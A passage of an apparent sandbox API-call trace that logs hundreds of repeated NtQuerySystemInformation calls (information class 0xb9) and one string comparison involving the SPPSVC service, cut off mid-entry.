NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x50, ResultLength=0x0) [0271.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x28, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0271.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.229] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b8, Length=0x50, ResultLength=0x0) [0271.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0271.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0271.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0271.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0271.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccf0, Length=0x20, ResultLength=0x0) [0271.253] NtQuerySystemInformation (SystemInformationClass=0xb9, 